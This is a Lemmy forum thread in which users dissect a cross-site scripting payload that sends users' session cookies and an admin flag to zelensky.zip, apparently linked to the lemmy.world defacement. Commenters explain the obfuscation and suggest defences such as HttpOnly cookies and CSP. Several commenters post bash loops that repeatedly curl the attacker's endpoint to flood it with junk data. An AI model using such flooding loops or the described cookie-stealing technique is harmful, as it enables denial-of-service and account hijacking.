135

Are they just an issue with wefwef or trying to use an exploit

top 50 comments
sorted by: hot top controversial new old
[-] malloc@programming.dev 54 points 1 year ago

Lemmy.world instance under attack right now. It was previously redirecting to 🍋 🎉 and the title and side bar changed to antisemitic trash.

They supposedly attributed it to a hacked admin account and was corrected. But the instance is still showing as defaced and now the page just shows it was “seized by reddit”.

Seems like there is much more going on right now and the attackers have much more than a single admin account.

[-] malloc@programming.dev 23 points 1 year ago

I just want to add a quick note:

From OPs screenshot, I noticed the JS code is attempting to extract the session cookie from the users that click on the link. If it’s successful, it attempts to exfiltrate to some server otherwise sends an empty value.

You can see the attacker/spammer obscures the url of the server using JS api as well.

May be how lemmy.world attackers have had access for a lengthy period of time. Attackers have been hijacking sessions of admins. The one compromised user opened up the flood gates.

Not a sec engineer, so maybe someone else can chime in.

[-] Gellis12@lemmy.ca 14 points 1 year ago

Here's a quick bash script if anyone wants to help flood the attackers with garbage data to hopefully slow them down: while true; do curl https://zelensky.zip/save/$(echo $(hostname) $(date) | shasum | sed 's/.\{3\}$//' | base64); sleep 1; done

Once every second, it grabs your computer name and the current system time, hashes them together to get a completely random string, trims off the shasum control characters and base64 encodes it to make everything look similar to what the attackers would be expecting, and sends it as a request to the same endpoint that their xss attack uses. It'll run on Linux and macOS (and windows if you have a WSL vm set up!) and uses next to nothing in terms of system resources.

[-] gandalftheBlack@lemmy.ml 4 points 1 year ago* (last edited 1 year ago)

Here's the one where it uses epoch time (better randomization) and also hides the output of curl

while true; do curl https://zelensky.zip/save/$(echo $(hostname) $(date +%s) | shasum | sed 's/.\{3\}$//' | base64) &> /dev/null ; echo "done."; done

[-] Kangie@lemmy.srcfiles.zip 4 points 1 year ago

Try

while true; do curl https://zelensky.zip/save/$(echo $(hostname) $(date) | shasum | sed 's/.\{3\}$//' | base64) > /dev/null ; sleep 1; done

It'll prevent you from having to see the drivel that curl returns from that site.

[-] Gellis12@lemmy.ca 3 points 1 year ago

Oh weird, it wasn't returning anything a few minutes ago. I wonder if we pissed then off lol

[-] Kangie@lemmy.srcfiles.zip 2 points 1 year ago

Not sure, I wasn't that long after you and I started getting HTML responses back from the page. Standard Russian Propaganda that doesn't need to be repeated here - if you've seen the claims once you've seen 'em a million times!

I did take the steps of reporting this abuse to cloudflare (who they're using for DDOS protection) and their registrar.

load more comments (2 replies)
[-] Mic_Check_One_Two@reddthat.com 1 points 1 year ago

You seem to be correct. Some sort of drive by login token scraper. Changing your password won’t help, because they still have an authorized copy of your login token. And I don’t think Lemmy has any sort of “Log out of all devices” button, (which deauthorizes all of the account’s login tokens) so there’s not much that a compromised account holder can do to stop it once the hacker has that token.

It’s the same thing that got Linus Tech Tips a few weeks back. Their entire YouTube account got hacked and turned into a fake “buy into our crypto and Elon Musk will give you a bunch of money” scam a few weeks back. And Linus quickly discovered that changing their passwords didn’t help, because the hackers were able to simply continue using the token they already had.

This was likely going on for a while, and only recently got activated because they finally snagged an admin account. Shit like this can lurk for a long time, simply waiting for the right target to stumble into it. They don’t really care about the individual accounts, except for helping spread the hack farther. But once they grabbed that admin account, they had what they wanted.

[-] RoundSparrow@lemmy.ml 9 points 1 year ago

Another instance was hacked too: https://lemmy.blahaj.zone/

[-] Cmot_Dibbler@lemmy.ml 7 points 1 year ago

Lemon party... Truly the fediverse is bringing us back to the golden age of the internet.

[-] BanjosKazoo@geddit.social 2 points 1 year ago

I can't log into my account on lemmy.world, but I guess this is what they mean by federation and different instances continuing to work.

[-] Tartas1995@discuss.tchncs.de 37 points 1 year ago* (last edited 1 year ago)

Hey, I can tell you want it does. While I don't know if they try to download something too (while it really doesn't look like it), they are trying to steal your browser cookies.

I haven't removed the obfuscation yet as I am literally in bed but I can tell the general idea of the code.

Onload is a html attribute. Html attribute tell your browser more about what the browser should be doing. So basically onload is an instruction to your browser. By posting those comments, they try to run something called cross site scripting. Basically they want to run their code in your browser without them being the website owner. So now we know the intend of the post, let's look into the details.

Onload is an attribute that tells the browser to do something once it is fully loaded.

Fetch is a function that allows your browser to request additional information from the server. Endless scrolling would be done with that.

String.fromcharcode is just there to hide a little bit. Think of it as a fancy way to say a word. they are saying a website to connect to there.

Then document.cookie are your cookies for that website.

The next thing is probably your username or something.

So what does that mean? They try to make your browser execute their code when the website is onloaded. The code sends your cookies and your username(?) To a server. They probably save the username and cookie and try to steal the account later.

You seeing the code is good evidence that your browser hasn't execute the code as the browser didn't understand it as code to be executed but code to display. So you are probably safe and don't need to worry

Edit: ups sorry for not answering the question. I don't know which client they are targeting. They might or might not be targeting wefwef. But they target you, the user, too. And it is probably for Webbrowser users, so chances are wefwef or other web clients.

[-] erre@feddit.win 17 points 1 year ago* (last edited 1 year ago)

Looks like it's issuing a GET to https://zelensky.zip/save/{ENCODED_JWT_TOKEN_AND_NAV_FLAG}. The ENCODED_JWT_TOKEN is from btoa(document.cookie+nav_flag) where nav_flag is essentially 'navAdmin' if the account hit is an admin or '' if the user hit is not an admin (it checks if the admin button in the nav exists). Their server is likely logging all incoming requests and they just need to do a quick decoding to get jwt tokens and a flag telling them if it's an admin account.

I'd be hesitant to visit Lemmy on a browser atm 😓

[-] Supermariofan67@lemmy.fmhy.ml 18 points 1 year ago

Sure enough, the .zip TLD is just being used for malicious activity

[-] Blizzard@lemmy.zip 6 points 1 year ago

Lemmy.zip is cool!

[-] ShellMonkey@lemmy.socdojo.com 4 points 1 year ago

Good to know, will look into adding it to the kill-it lists out there. Generally more inclined to rely on dynamic naughty lists but sometimes you just need to cut off the limb if it's 90% rotten.

[-] humanreader@infosec.pub 1 points 1 year ago

Google Domains, creating new ways to exploit users right before being sold off to Squarespace.

[-] killbot_gamma@midwest.social 6 points 1 year ago

Can we just hit that domain with junk data and crash their shit?

[-] Tartas1995@discuss.tchncs.de 1 points 1 year ago

Yo thanks for the obfuscation. Makes a lot of sense.

[-] Xylight@lemmy.xylight.dev 9 points 1 year ago

Doesn't Lemmy use HttpOnly cookies? This would fix any js based exploit.

[-] Dirk@lemmy.ml 4 points 1 year ago

Also, strict CSP would prevent it entirely.

load more comments (2 replies)
[-] Tartas1995@discuss.tchncs.de 2 points 1 year ago

I don't know what Lemmy uses tbh. I don't even know if the code would work when run. Like i don't know e.g. if they grab the username(?) correctly. I just understand their intentions but yeah their execution might be horrible.

load more comments (1 replies)
[-] Gellis12@lemmy.ca 3 points 1 year ago

The encoded strings are https://zelensky(dot)zip/save/ and navAdmin

[-] Icarus@lemmy.ml 1 points 1 year ago

so does this run automatically ? without the user doing anything ?

[-] Tartas1995@discuss.tchncs.de 6 points 1 year ago

If it would work, which it seems like it doesn't. Yes, it is intended to be automatical.

[-] nothendev@sopuli.xyz 33 points 1 year ago

if it has document.cookie in it - it is trying to steal your cookies, to use your account. that's a JavaScript link that, well, sends your account cookies to a random ass site.

[-] wetnoodle@lemmy.blahaj.zone 26 points 1 year ago

idk for sure but people are saying lemmy.world got hacked maybe it has to do with that?

[-] Max_P@lemmy.max-p.me 18 points 1 year ago

Definitely seems to be trying to exploit the same thing

[-] wetnoodle@lemmy.blahaj.zone 6 points 1 year ago* (last edited 1 year ago)

yeah after reading more of the post I linked it definitely looks like it

[-] tarjeezy@lemmy.ca 13 points 1 year ago

The encoded string contains the URL zelensky dot zip. Zip is one of the newer top-level domains. It itself is not a zip file, but I am not going to visit that site to find out whatever treasures it has to offer..

[-] Dirk@lemmy.ml 2 points 1 year ago

Another reason to block this TLD in the firewall solution.

[-] tarjeezy@lemmy.ca 2 points 1 year ago

Yea I've got both .zip and .mov blocked on my pihole

load more comments (1 replies)
load more comments (7 replies)
[-] Gellis12@lemmy.ca 1 points 1 year ago

Not just that, it looks for a navAdmin cookie in your browser and sends that to zelensky(dot)zip/save/<your cookie here> in the form of a GET request.

[-] erre@feddit.win 1 points 1 year ago

Curl didn't return anything. They're likely just using it to log requests since the request path contains the data they need.

[-] BrikoX@lemmy.zip 9 points 1 year ago

Clicking on it would run javascript on load (most browsers block it by default), but I would avoid clicking either way.

[-] Kissaki@feddit.de 1 points 1 year ago

You can't see what the link actually is, only its Label.

Onload, if interpreted as Javascript instead of text, would have executed on load, not on click.

[-] Granixo@feddit.cl 6 points 1 year ago

Spez's Revenge

[-] aloeha@lemmy.world 1 points 1 year ago

Hey, has this been fixed? I'm nervous about using Lemmy on my work computer now.

load more comments (1 replies)
load more comments
view more: next ›
this post was submitted on 10 Jul 2023
135 points (97.2% liked)

Asklemmy

43396 readers
1107 users here now

A loosely moderated place to ask open-ended questions

Search asklemmy 🔍

If your post meets the following criteria, it's welcome here!

  1. Open-ended question
  2. Not offensive: at this point, we do not have the bandwidth to moderate overtly political discussions. Assume best intent and be excellent to each other.
  3. Not regarding using or support for Lemmy: context, see the list of support communities and tools for finding communities below
  4. Not ad nauseam inducing: please make sure it is a question that would be new to most members
  5. An actual topic of discussion

Looking for support?

Looking for a community?

~Icon~ ~by~ ~@Double_A@discuss.tchncs.de~

founded 5 years ago
MODERATORS